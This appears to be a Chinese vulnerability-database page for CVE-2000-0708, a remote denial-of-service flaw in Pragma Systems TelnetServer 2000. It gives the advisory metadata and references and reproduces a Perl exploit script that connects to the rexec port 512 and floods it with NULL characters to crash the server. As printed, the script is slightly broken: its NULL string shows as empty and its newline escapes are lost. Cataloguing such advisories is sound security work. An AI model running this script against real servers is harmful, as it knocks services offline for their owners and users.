Pragma Systems TelnetServer 2000缓冲区溢出漏洞

Pragma Systems TelnetServer 2000缓冲区溢出漏洞

漏洞ID 1105975 漏洞类型 缓冲区溢出
发布时间 2000-08-24 更新时间 2005-05-02
图片[1]-Pragma Systems TelnetServer 2000缓冲区溢出漏洞-安全小百科CVE编号 CVE-2000-0708
图片[2]-Pragma Systems TelnetServer 2000缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200010-108
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20175
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-108
|漏洞详情
PragmaSystemsTelnetServer20004.0版本存在缓冲区溢出漏洞。远程攻击者可以借助到rexec端口的一系列超长空字符来导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/1605/info

Pragma Systems offers a windows remote access server called TelnetServer 2000. TelnetServer crashes if more than 1000 NULL characters are sent to its rexec port, 512. This can be executed by an anonymous attacker from anywhere on the internet. It is not known whether this apparent overflow can be exploited to gain access on the victim host.

#!/usr/bin/perl
#########################################################
# Exploit by USSRLabs www.ussrback.com
# send 5k of null causes the server to crash.
#########################################################
#
# ./$0.pl -s <server> -p <port>
#
# Null request DoS
#
use Getopt::Std;
use Socket;

getopts('s:p', %args);
if(!defined($args{s})){&usage;}

my($serv,$port,$URL,$buf,$in_addr,$paddr,$proto);
$serv = $args{s};                       # remote server
$port = $args{p} || 512;                # remote port, default is 512
$foo = "";                            # this is the Null
$number = "1000";                       # this is the total number of Null
$data .= $foo x $number;                # result of $foo times $number
$buf = "$data";                         # issue this response to the server

$in_addr = (gethostbyname($serv))[4] || die("Error: $!n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!n");
$proto = getprotobyname('tcp') || die("Error: $!n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";

print("Data has been successfully sent to $servn");

sub usage {die("nn$0 -s <server> [ -p <port> ]nn");}
|参考资料

来源:BID
名称:1605
链接:http://www.securityfocus.com/bid/1605
来源:www.pragmasys.com
链接:http://www.pragmasys.com/TelnetServer/
来源:NTBUGTRAQ
名称:20000824RemoteDoSAttackinPragmaTelnetServer2000(RemoteExecuteDaemon)Vulnerability
链接:http://www.ntbugtraq.com/default.asp?pid=36&sid;=1&A2;=ind0008&L;=NTBUGTRAQ&P;=R4247

相关推荐: WebTrends Reporting Center管理接口路径泄露漏洞

WebTrends Reporting Center管理接口路径泄露漏洞 漏洞ID 1107638 漏洞类型 信息泄露 发布时间 2004-01-20 更新时间 2004-12-31 CVE编号 CVE-2004-2748 CNNVD-ID CNNVD-200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享